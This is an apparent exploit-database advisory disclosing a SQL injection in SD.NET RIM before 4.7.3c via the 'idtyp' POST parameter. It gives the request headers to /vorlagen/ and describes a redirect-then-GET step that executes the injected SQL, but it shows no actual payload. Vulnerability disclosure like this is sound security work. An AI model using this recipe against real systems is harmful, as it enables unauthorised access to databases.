SD.NET RIM 4.7.3c SQL Injection

SD.NET RIM version 4.7.3c suffers from a remote SQL injection vulnerability.

MD5 | 77ba93428e8b43d7e973db939528442b

# Exploit Title: SD.NET RIM 4.7.3c - 'idtyp' SQL Injection
# Date: 2019-11-05
# Exploit Author: Fabian Mosch (r-tec IT Security GmbH)
# Vendor Homepage:
# Software Link:
# Version: < 4.7.3c
# Tested on: < 4.7.3c
# CVE : N/A

# SD.NET RIM before version 4.7.3c is vulnerable to a SQL-Injection vulnerability. To Exploit the vulnerability
# an attacker has to inject arbitrary SQL Statements in the following POST parameters:

POST /vorlagen/?__=SOMEBASE64 HTTP/1.1
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 182
Connection: close
Upgrade-Insecure-Requests: 1


# The attacker is then redirected with a 302 redirect to an URL /templates/?__=NEWBASE64 as GET request.
# By issuing the second request the arbitrary SQL-Statement gets executed.

Related Posts